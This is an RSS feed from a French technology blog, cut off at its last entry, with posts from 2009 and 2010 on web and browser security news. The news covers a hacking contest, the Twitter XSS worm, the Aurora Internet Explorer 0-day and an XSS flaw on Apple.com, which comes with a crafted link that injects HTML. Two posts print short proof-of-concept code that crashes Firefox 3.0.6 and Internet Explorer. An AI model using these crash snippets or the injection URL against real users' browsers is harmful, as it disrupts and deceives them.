<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blogmotion &#187; exploit</title>
	<atom:link href="http://blogmotion.fr/tag/exploit/feed" rel="self" type="application/rss+xml" />
	<link>http://blogmotion.fr</link>
	<description>Culture web et nouvelles technologies informatiques</description>
	<lastBuildDate>Thu, 09 Feb 2012 18:38:20 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<meta name="generator" content="WordPress" />
	<atom:link rel='hub' href='http://blogmotion.fr/?pushpress=hub'/>
		<item>
		<title>Lancement de Pirate-Moi : un concours de hacking</title>
		<link>http://blogmotion.fr/systeme/concours-hacking-6816</link>
		<comments>http://blogmotion.fr/systeme/concours-hacking-6816#comments</comments>
		<pubDate>Fri, 31 Dec 2010 17:40:21 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Système]]></category>
		<category><![CDATA[concours]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=6816</guid>
		<description><![CDATA[Pirate-Moi.com est un projet au nom de domaine aguicheur qui propose aux hackers, pirates, passionnés de la sécurité, experts de se mesurer entre-eux. Le but étant de pirater l&#8217;application web utilisée sur le site concours.pirate-moi.com. Le premier à prouver son hack aux organisateurs du jeu remportera un iPad. Pourquoi un tel concours ? Ce type [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://pirate-moi.com">Pirate-Moi.com</a> est un projet au nom de domaine aguicheur qui p<strong>ropose aux hackers, pirates, passionnés de la sécurité, experts de se mesurer entre-eux</strong>. Le but étant de <strong>pirater l&#8217;application web utilisée sur le site concours.pirate-moi.com</strong>.</p>
<p style="text-align: center;"><a href="http://pirate-moi.com/" title="pirate-moi"><img class="alignnone size-full wp-image-6817" style="border: #ccc 1px solid;" title="pirate-moi" src="http://blogmotion.fr/wp-content/uploads/2010/12/pirate-moi.png" alt="" width="590" height="151" /></a></p>
<p>Le premier à prouver son hack aux organisateurs du jeu remportera un iPad.<span id="more-6816"></span></p>
<h3>Pourquoi un tel concours ?</h3>
<p>Ce type de concours permet de tester la sécurité de nombreux éléments qui jouent un rôle plus ou moins important dans le cadre de la création de site internet (forum, blogs, portails ecommerce, etc.).</p>
<blockquote><p>&laquo;&nbsp;Nous souhaitons sensibiliser les webmasters, les développeurs, agences de communication etc, au fait que la mise en œuvre d&#8217;application web peut comporter des risques aussi bien pour les données hébergées sur le serveur que pour les internautes qui visitent ce dernier.&nbsp;&raquo;</p></blockquote>
<p><strong><span style="text-decoration: underline;">Sont interdits :</span></strong></p>
<ol>
<li>Les attaques de type DDOS, Dos et social engineering (visa, mastercard, paypal&#8230;)</li>
<li>L’utilisation de logiciel (scanner de vulnérabilité, logiciel pour aider à l’injection de code arbitraire)</li>
</ol>
<p>Vous l&#8217;aurez compris, ce concours oeuvre pour un web plus &laquo;&nbsp;sécurise&nbsp;&raquo;. Bien que je ne sois pas certains que cela fasse bouger les lignes, ça permettra à certains de débuter l&#8217;année de façon intensive <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><strong>Le concours débute à la première seconde de l&#8217;année 2011</strong>, c&#8217;est à dire dans quelques heures.</p>
<p><strong>Pour vous inscrire</strong> <a href="http://www.pirate-moi.com/wp-login.php?action=register">ça se passe ici</a> (le <a href="http://www.pirate-moi.com/reglements-du-concours">règlement</a> est ici) mais <strong><span style="color: #ff0000;">vous devez vous inscrire avant la fin de l&#8217;année 2010</span></strong> !<br />
<a href="https://twitter.com/pirate_moi">Compte twitter</a> de l&#8217;opération - <a href="http://www.commentcamarche.net/news/5853821-eric-seguinard-pirate-moi-com-le-but-n-est-pas-d-etre-malveillant-mais-de-montrer-aux-personnes-qui-nous-soumettront-leurs">Interview</a> de Eric Seguinard chez CCM</p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/systeme/concours-hacking-6816">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 31/12/2010 |
<a href="http://blogmotion.fr/systeme/concours-hacking-6816#comments">19 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/systeme/concours-hacking-6816/feed</wfw:commentRss>
		<slash:comments>19</slash:comments>
		</item>
		<item>
		<title>Pourquoi un &#171;&#160;ver&#160;&#187; s&#8217;est propagé sur Twitter</title>
		<link>http://blogmotion.fr/internet/twitter/xss-twitter-faille-6309</link>
		<comments>http://blogmotion.fr/internet/twitter/xss-twitter-faille-6309#comments</comments>
		<pubDate>Tue, 21 Sep 2010 20:42:14 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Twitter]]></category>
		<category><![CDATA[code]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[serveur]]></category>
		<category><![CDATA[social]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=6309</guid>
		<description><![CDATA[MàJ: on sait que c&#8217;est un adolescent Australien qui est à l&#8217;origine de la découverte de cette faille, il ne pensait pas en revanche que son tweet aurait de telles conséquences (source) Durant quelques heures aujourd&#8217;hui nous avons eu le droit à une nouvelle #Twitpocalypse qui a pollué des dizaines de milliers de timeline. Des [...]]]></description>
			<content:encoded><![CDATA[<p><span style="text-decoration: underline;"><strong>MàJ</strong></span>: on sait que c&#8217;est un adolescent Australien qui est à l&#8217;origine de la découverte de cette faille, il ne pensait pas en revanche que son tweet aurait de telles conséquences (<a href="http://www.zdnet.fr/actualites/un-adolescent-australien-de-17-ans-a-l-origine-de-la-panique-sur-twitter-39754785.htm">source</a>)</p>
<p>Durant quelques heures aujourd&#8217;hui nous avons eu le droit à une nouvelle <a href="https://search.twitter.com/search?q=%23Twitpocalypse"><em>#Twitpocalypse</em></a> qui a <strong>pollué des dizaines de milliers de timeline</strong>.</p>
<p style="text-align: center;"><img class="alignnone size-full wp-image-6311" style="border: #ccc solid 1px;" title="twitter-xss" src="http://blogmotion.fr/wp-content/uploads/2010/09/twitter-xss.jpg" alt="" width="590" height="200" /></p>
<p>Des dizaines de milliers d&#8217;utilisateurs ont été victimes de plusieurs vers se propageant via le réseau social, de façon particulièrement efficace à cause d&#8217;une faille XSS. On parle de &laquo;&nbsp;ver&nbsp;&raquo; par abus de langage, puisqu&#8217;il s&#8217;agit d&#8217;une méthode malveillante qui s&#8217;est propagée de façon quasi-autonome (cf. <a href="http://fr.wikipedia.org/wiki/Ver_informatique">définition</a>).<span id="more-6309"></span></p>
<p>Conséquence : de nombreux <strong>tweets publiés à l&#8217;insu des utilisateurs</strong> comme en témoigne le <a href="http://twitter.com/reesmarc/status/25111741024">tweet de Marc</a> :</p>
<p style="text-align: center;"><img class="alignnone size-full wp-image-6310" style="border: #ccc solid 1px;" title="twitter-xss-exemple" src="http://blogmotion.fr/wp-content/uploads/2010/09/twitter-xss-exemple.png" alt="" width="590" height="269" /></p>
<p style="text-align: left;">Ce code Javascript permet de <strong>répliquer un code couleur noir dès qu&#8217;il est survolé par la souris</strong> (onmouseover en JS) pour les utilisateurs du site Twitter.com. D&#8217;autres utilisateurs ont eu le droit à des redirections vers des sites pornos comme en témoigne Sophos :</p>
<p style="text-align: center;"></p>
<p style="text-align: left;">Une autre faille ne nécessitait même aucun survol pour s&#8217;auto-propager, il suffisait de consulter sa timeline comme en témoigne <a href="http://www.winmacsofts.com/2010/09/twitter-actuellement-sur-les-rotules/">Deherve</a>.</p>
<p style="text-align: left;">Alors que Twitter compte <a title="Les nouveautés de la nouvelle version de Twitter.com" href="http://blogmotion.fr/internet/twitter/reseau-social-6263">reconquérir ses utilisateurs</a> qui utilisent une application tierce (TweetDeck, Seesmic, etc.) au lieu de Twitter.com c&#8217;est plutôt mal engagé. En effet, <strong>seule la version web était vulnérable. L</strong>a faille exploite du code html+javascript non pris en charge par les clients tiers donc non touchés.</p>
<p style="text-align: left;"><a href="http://blog.twitter.com/2010/09/all-about-onmouseover-incident.html">Sur son blog</a>, <strong>Twitter assure avoir localisé et corrigé la faille</strong> quelques heures après cette découverte. Ce genre de faille reste tout à fait dangereuse puisqu&#8217;elle peut <strong>paralyser complètement le réseau social</strong> utilisé quotidiennement par millions de personnes et de sociétés.</p>
<p style="text-align: left;">On relèvera au passage le titre du billet précédent sur le blog twitter qui était &laquo;&nbsp;<a href="http://blog.twitter.com/2010/09/better-twitter.html">A Better Twitter</a>&laquo;&nbsp;&#8230; à méditer.</p>
<p style="text-align: left;"><a href="http://www.01net.com/editorial/521235/une-faille-provoque-la-panique-sur-twitter/"><em>Via</em></a><em> et </em><a href="http://www.pcinpact.com/actu/news/59472-twitter-plantage-panne-bug-erreur.htm"><em>via</em></a></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/twitter/xss-twitter-faille-6309">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 21/09/2010 |
<a href="http://blogmotion.fr/internet/twitter/xss-twitter-faille-6309#comments">8 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/twitter/xss-twitter-faille-6309/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Se prémunir contre les menaces de l&#8217;attaque 0-day Aurora</title>
		<link>http://blogmotion.fr/internet/securite/0day-aurora-removal-4882</link>
		<comments>http://blogmotion.fr/internet/securite/0day-aurora-removal-4882#comments</comments>
		<pubDate>Wed, 20 Jan 2010 10:01:03 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[0-day]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[navigateur]]></category>
		<category><![CDATA[remote]]></category>
		<category><![CDATA[removal]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[stinger]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=4882</guid>
		<description><![CDATA[L&#8217;information n&#8217;est pas passée inaperçue cette semaine, c&#8217;est le moins que l&#8217;on puisse en dire. Google a annoncé avoir reçu des attaques depuis la chine et l&#8217;on apprenait il y a quelques jours qu&#8217;il s&#8217;agissait d&#8217;une faille 0-Day concernant Microsoft Internet Explorer. Cette attaque a été baptisée Aurora. Je vous propose au travers de ce [...]]]></description>
			<content:encoded><![CDATA[<p>L&#8217;information n&#8217;est pas passée inaperçue cette semaine, c&#8217;est le moins que l&#8217;on puisse en dire. Google <a href="http://googleblog.blogspot.com/2010/01/new-approach-to-china.html">a annoncé</a> avoir <strong>reçu des attaques depuis la chine</strong> et l&#8217;on apprenait il y a quelques jours qu&#8217;il s&#8217;agissait d&#8217;une <strong>faille 0-Day concernant <a href="http://www.microsoft.com/technet/security/advisory/979352.mspx">Microsoft Internet Explorer</a></strong>. Cette attaque a été baptisée <em><strong>Aurora</strong></em>.</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-4885" style="border: 1px solid #ccc;" title="zeroday-ie" src="http://blogmotion.fr/wp-content/uploads/2010/01/zeroday-ie.png" alt="" width="590" height="100" /></p>
<p>Je vous propose au travers de ce billet un <strong>résumé de la situation</strong> qui s&#8217;éparpille dans un tous les sens sur les sites d&#8217;informations.<span id="more-4882"></span></p>
<p><strong>Internet explorer 6, 7 et 8</strong> sont impactés par cette faille permettant l&#8217;exécution de code arbitraire à distance (remote shell). Microsoft annonce d&#8217;ores et déjà qu&#8217;un <a href="http://blogs.technet.com/msrc/archive/2010/01/19/security-advisory-979352-going-out-of-band.aspx"><strong>correctif d&#8217;urgence</strong> sera beinttôt  disponible</a> sans pour autant attendre les patch Tuesday (tous les deuxièmes mardi de chaque mois). <strong>Microsoft tente de minimiser cette information</strong> en recommandant aux utilisateurs de IE 6 &amp; 7 de migrer vers la version 8 dans laquelle la protection <em>Data Execution Prevention</em> est activée par défaut.</p>
<p>Personnellement <strong>je vous conseille d&#8217;utiliser un navigateur alternatif</strong> tel que Firefox, Opera reconnus stable et sans failles béantes.</p>
<p>Voici l&#8217;information officielle des contacts Microsoft Entreprise :</p>
<blockquote><p><span style="text-decoration: underline;">Internet Explorer 6 </span><br />
Windows 2000 : Exploitable<br />
Windows XP :  Exploitable (et exploité)<br />
Windows Vista et 7 : néant</p>
<p><span style="text-decoration: underline;">Internet Explorer 7 </span><br />
Windows 2000 : néant (IE 7 n’est pas disponible pour Windows 2000) Windows XP : Potentiellement exploitable mais l’attaque en cours est sans effet<br />
Windows Vista  : grâce au mode protégé d’IE, l’exploitation ne fonctionne pas.<br />
Windows 7 : néant</p>
<p><span style="text-decoration: underline;">Internet Explorer 8 </span><br />
Windows 2000 : néant (IE 8 n’est pas disponible pour Windows 2000)<br />
Windows XP : Grâce à la protection DEP active par défaut sur Windows XP SP3, l’exploitation ne fonctionne pas.<br />
Windows Vista : Grâce au mode protégé d’IE et à la protection DEP, l’exploitation ne fonctionne pas.<br />
Windows 7 : Grâce au mode protégé d’IE et à la protection DEP actives par défaut, l’exploitation ne fonctionne pas.</p>
<p>Voici les conseils que nous vous recommandons de suivre pour mieux vous protéger si vous utilisez Windows XP avec Internet Explorer 6 :</p>
<ol>
<li>Si cela vous est possible, Installez Internet Explorer 8 ;</li>
<li>S’il ne vous est pas possible d’installer Internet Explorer 8, passez à la dernière version de Service Pack en appliquant le Service Pack 3 de Windows XP (et toutes les mises à jour postérieures au SP3) ;</li>
<li>A défaut d’appliquer le SP3, si vous utilisez Windows XP SP2, vous pouvez activer manuellement la protection DEP (Data Execution Prevention) ;</li>
<li>Mettre en œuvre les éventuelles autres solutions de contournement et atténuations citées dans l’avis de sécurité.</li>
</ol>
</blockquote>
<h3>Une faille 0-Day c&#8217;est quoi ?</h3>
<p>Une fois <strong>0-Day</strong> correspond à des attaques qui <strong>exploitent une faille d’un programme jusqu’alors inconnue</strong>. Cela va peut-être en surprendre quelques-uns, mais certaines failles sont connues des éditeurs et pas corrigées pour autant&#8230; voilà qui les différencie avec les failles 0-Day.</p>
<h3>Détecter la vulnérabilité avec Stinger</h3>
<p>George Kurtz (McAfee Chief&#8217;s Technology Officer) a publié un <a href="http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/">long billet sur son blog</a> au sujet de cette attaque Aurora que je vous invite à lire. L&#8217;éditeur antiviral McAfee a semble-t-il été le premier à comprendre que l&#8217;attaque se basait sur Internet Explorer. <strong>Une attaque très minutieuse et professionnelle</strong> <a href="http://www.01net.com/editorial/511269/comment-google-a-ete-attaque/">selon 01net</a>.</p>
<p><img class="aligncenter size-full wp-image-4891" title="operation-aurora" src="http://blogmotion.fr/wp-content/uploads/2010/01/operation-aurora.png" alt="" width="590" height="140" /></p>
<p>McAfee Labs vient de mettre un ligne l’utilitaire <strong>Stinger</strong> pour &laquo;&nbsp;Aurora&nbsp;&raquo;, celui-ci <strong>détecte et élimine les menaces associées aux attaques de l’Opération Aurora</strong>. Cet utilitaire peut être <strong>téléchargé gratuitement</strong> à partir du <a href="http://vil.nai.com/vil/averttools.aspx">McAfee Threat Center</a> (<a href="http://download.nai.com/products/mcafee-avert/aurora_stinger.exe">lien direct</a>) :</p>
<p><img class="aligncenter size-full wp-image-4883" title="mcafee-stinger" src="http://blogmotion.fr/wp-content/uploads/2010/01/mcafee-stinger.png" alt="" width="449" height="381" /></p>
<p><img class="aligncenter size-full wp-image-4884" title="mcafee-stinger-about" src="http://blogmotion.fr/wp-content/uploads/2010/01/mcafee-stinger-about.png" alt="" width="411" height="464" /></p>
<p>Le plus sage étant de mettre à jour Internet Explorer en version 8 (la 9 ne va pas tarder) et de ne plus l&#8217;utiliser comme le <a href="http://www.certa.ssi.gouv.fr/site/CERTA-2010-ALE-001/">conseille le CERTA</a>.</p>
<h3>Aurora déjà exploitée</h3>
<p><a href="http://www.metasploit.com/">Metasploit</a> (projet de sécurité open-source) a d&#8217;ores et déjà <strong>intégré l&#8217;exploit dans son framework</strong>. Un <a href="http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html">billet complet</a> à ce sujet est consultable histoire de montrer à Microsoft que cette faille est importante et qu&#8217;il ne faut pas la minimiser.</p>
<h3>Conclusion</h3>
<p>Le cas <strong>le plus problématique se trouve en entreprise</strong>. Nombreuses sont encore celles qui utilisent Internet Explorer 6 pour des <strong>questions de compatibilité</strong> avec des applications qui ne tournent pas sur les versions ultérieures ou migrer vers un autre navigateur.</p>
<p>C&#8217;est pour cette raison que Microsoft doit de toutes façon sortir un correctif.</p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 20/01/2010 |
<a href="http://blogmotion.fr/internet/securite/0day-aurora-removal-4882#comments">5 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/securite/0day-aurora-removal-4882/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Une faille XSS sur Apple.com non corrigée</title>
		<link>http://blogmotion.fr/internet/exploit-xss-apple-4339</link>
		<comments>http://blogmotion.fr/internet/exploit-xss-apple-4339#comments</comments>
		<pubDate>Wed, 04 Nov 2009 09:21:22 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[fail]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=4339</guid>
		<description><![CDATA[Une faille XSS est présente depuis hier déjà sur le site d&#8217;Apple. Ce billet n&#8217;a d&#8217;autre but que celui d&#8217;encourager les développeurs à corriger cette brèche. Voici ce que l&#8217;on peut y voir en modifiant simplement certains paramètres GET de l&#8217;URL : Pour le voir par vous même cliquez-ici (si la faille n&#8217;a pas encore [...]]]></description>
			<content:encoded><![CDATA[<p>Une <a href="http://fr.wikipedia.org/wiki/Cross-site_scripting"><strong>faille XSS</strong></a> est présente depuis hier déjà sur le site d&#8217;<strong>Apple</strong>. Ce billet n&#8217;a d&#8217;autre but que celui d&#8217;encourager les développeurs à corriger cette brèche.</p>
<p>Voici ce que l&#8217;on peut y voir en modifiant simplement certains paramètres GET de l&#8217;URL :</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-4341" style="border: 1px solid #ccc;" title="faille-xss-apple" src="http://blogmotion.fr/wp-content/uploads/2009/11/faille-xss-apple.png" alt="faille-xss-apple" width="588" height="480" /></p>
<p><span id="more-4339"></span>Pour le voir par vous même <a href="http://www.apple.com/fr/itunes/affiliates/download/?artistName=Apple%20&amp;thumbnailUrl=http://www.cedynamix.fr/wp-content/uploads/Tux/Tux-G2.png&amp;itmsUrl=http://fr.wikipedia.org/wiki/Cross-site_scripting&amp;albumName=%3Ca%20href=%22http://fr.wikipedia.org/wiki/Cross-site_scripting%22%3Eune%20faille%20XSS%3C/a%3E%20made">cliquez-ici</a> (si la faille n&#8217;a pas encore été corrigée).</p>
<p>A l&#8217;époque des liens raccourcis il est très facile de piéger une victime en profitant de cette faille XSS&#8230; <strong>pourquoi la société à la pomme  ne corrige-t-elle pas cette brèche</strong> ?</p>
<p><em>Via un tweet de <a href="http://twitter.com/mar1e">Mar1e</a></em></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/exploit-xss-apple-4339">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 04/11/2009 |
<a href="http://blogmotion.fr/internet/exploit-xss-apple-4339#comments">4 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/exploit-xss-apple-4339/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Une faille DoS qui plante Firefox 3.0.6</title>
		<link>http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275</link>
		<comments>http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275#comments</comments>
		<pubDate>Tue, 24 Feb 2009 22:58:33 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Sécurité]]></category>
		<category><![CDATA[crash]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[mozilla]]></category>
		<category><![CDATA[navigateur]]></category>
		<category><![CDATA[plantage]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=2275</guid>
		<description><![CDATA[Une possibilité de crash de Firefox (version 3.0.6 incluse) vient d&#8217;être révélée. Le code source concerne la balise &#171;&#160;BODY onload&#160;&#187; : &#60;BODY onload=" document.designMode='on'; document.removeChild(document.firstChild); document.queryCommandState('BackColor'); "&#62; Ce qui provoque : Cette faille active le mode d&#8217;édition &#171;&#160;rich text&#160;&#187; (variable), puis enlève le noeud (objet) pour ensuite intérroger l&#8217;état actuel de la commande &#8216;BackColor&#8217; (qui [...]]]></description>
			<content:encoded><![CDATA[<p>Une possibilité de <strong>crash</strong> de <strong>Firefox</strong> (version <strong>3.0.6</strong> incluse) vient d&#8217;être révélée.</p>
<p>Le code source concerne la balise &laquo;&nbsp;<strong>BODY onload</strong>&nbsp;&raquo; :</p>
<pre>&lt;BODY onload="
document.designMode='on';
document.removeChild(document.firstChild);
document.queryCommandState('BackColor');
"&gt;</pre>
<p>Ce qui provoque :</p>
<p><a href="http://blogmotion.fr/wp-content/uploads/2009/02/firefox-faille-plantage.png" rel="shadowbox[sbpost-2275];player=img;"><img class="aligncenter size-medium wp-image-2276" title="firefox-faille-plantage" src="http://blogmotion.fr/wp-content/uploads/2009/02/firefox-faille-plantage.png" alt="" width="512" height="411" /><span id="more-2275"></span></a></p>
<p>Cette faille active le <a href="http://blogmotion.fr/internet/modifier-une-page-web-en-javascript-wysiwyg-1184">mode d&#8217;édition &laquo;&nbsp;rich text&nbsp;&raquo;</a> (variable), puis enlève le noeud (objet) pour ensuite intérroger l&#8217;état actuel de la commande &#8216;BackColor&#8217; (qui n&#8217;existe plus étant donné que le noeud a été supprimé), et Firefox ne sait plus quoi faire, donc il plante&#8230; enfin c&#8217;est ce que j&#8217;en ai compris, si votre explication est meilleure les commentaires sont open !</p>
<p>En espérant que Mozilla <strong>colmate la faille</strong> assez <strong>rapidement</strong> parce que j&#8217;en connais qui vont s&#8217;arracher les cheveux si Firefox se ferme sans prévenir, la restauration des onglets ouverts avant le plantage ne suffisant pas toujours pour récupérer des textarea notamment <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><p style="border-top: 2px solid rgb(65, 105, 175); border-bottom: 2px solid rgb(65, 105, 175); padding: 5px 20px 5px 45px; background: rgb(223, 235, 255) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/world.gif) no-repeat scroll 15px 50%; text-align: left; color: rgb(102, 102, 102);"><a href="http://blogmotion.fr/wp-content/uploads/2009/02/exploit-firefox-306.html">Démo : cliquez ici pour planter Firefox (v3.0.7 max)</a></p></p>
<p><em><a href="http://www.milw0rm.com/exploits/8091">Source</a></em></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 24/02/2009 |
<a href="http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275#comments">2 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/internet/securite/une-faille-dos-qui-plante-firefox-306-2275/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Exploit de DoS touchant IE 6, 7 et 8</title>
		<link>http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015</link>
		<comments>http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015#comments</comments>
		<pubDate>Thu, 15 Jan 2009 09:28:52 +0000</pubDate>
		<dc:creator>Mr Xhark</dc:creator>
				<category><![CDATA[Système]]></category>
		<category><![CDATA[déni]]></category>
		<category><![CDATA[dos]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[faille]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[internet explorer]]></category>
		<category><![CDATA[navigateur]]></category>
		<category><![CDATA[service]]></category>

		<guid isPermaLink="false">http://blogmotion.fr/?p=2015</guid>
		<description><![CDATA[Un déni de service vient d&#8217;être découvert au sein du navigateur de Microsoft, Internet Explorer. Les versions touchées par cette exploit sont : Internet Explorer 6, 7 et 8 beta 2 (sera corrigé dans la 8.0 rc1). Le principe est relativement simple : on demande à IE de lire le contenu d&#8217;un pointeur vide au [...]]]></description>
			<content:encoded><![CDATA[<p>Un <a href="http://fr.wikipedia.org/wiki/Denial_of_service">déni de service</a> vient d&#8217;être découvert au sein du navigateur de Microsoft, <strong>Internet Explorer</strong>. Les versions touchées par cette exploit sont : <strong>Internet Explorer 6, 7 et 8 beta 2</strong> (sera corrigé dans la 8.0 rc1).</p>
<p><img class="aligncenter size-full wp-image-2018" title="ie-exploit-demo" src="http://blogmotion.fr/wp-content/uploads/2009/01/ie-exploit-demo.png" alt="" width="419" height="262" /></p>
<p>Le principe est relativement simple : on demande à IE de lire le contenu d&#8217;un <strong>pointeur vide</strong> au chargement de la page <a href="http://blogmotion.fr/wp-content/uploads/2009/01/exploit-ie.htm">(cliquez ici pour essayer)</a> :</p>
<pre>&lt;body onload=screen[""]&gt;<span id="more-2015"></span></pre>
<p><strong>Rien d&#8217;alarmant</strong> toutefois puisque IE considère le code comme potentiellement dangereux :</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-2017" style="border: 1px solid #ccc;" title="ie-exploit-avertissement" src="http://blogmotion.fr/wp-content/uploads/2009/01/ie-exploit-avertissement.png" alt="" width="590" height="117" /></p>
<p style="text-align: left;">M&#8217;enfin c&#8217;est tout de même <strong>pas rassurant</strong> de voir que de tels exploits soit encore d&#8217;actualité dans les versions 7 et 8 d&#8217;Intenet Explorer (IE 6 encore je veux bien&#8230;).</p>
<p style="text-align: left;">On se souvient par ailleurs du fameux site de <a href="http://blogmotion.fr/internet/comment-crasher-internet-explorer-6-ie-6-108">crash IE</a> <img src='http://blogmotion.fr/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: left;"><p style="border-top: 2px solid rgb(65, 105, 175); border-bottom: 2px solid rgb(65, 105, 175); padding: 5px 20px 5px 45px; background: rgb(223, 235, 255) url(http://blogmotion.fr/wp-content/plugins/NiceWeb2CSS/icon/world.gif) no-repeat scroll 15px 50%; text-align: left; color: rgb(102, 102, 102);"><a href="http://firefox.com">Télécharger Firefox</a></p></p>
Vous devriez me suivre sur Twitter : <strong><a href="http://twitter.com/xhark">@xhark</a></strong>
<hr />
<p><small><a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015">Article original</a> écrit par Mr Xhark publié sur <a href="http://blogmotion.fr">Blogmotion</a> le 15/01/2009 |
<a href="http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015#comments">6 commentaires</a> |
<br />Attention : l'intégralité de ce billet est protégée par la licence <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/fr/">Creative Commons</a> 
</small></p>]]></content:encoded>
			<wfw:commentRss>http://blogmotion.fr/systeme/exploit-de-dos-touchant-ie-6-7-et-8-2015/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Failles Google Chrome</title>
		<link>http://blogmotion.fr/systeme/failles-google-chrome-772</link>
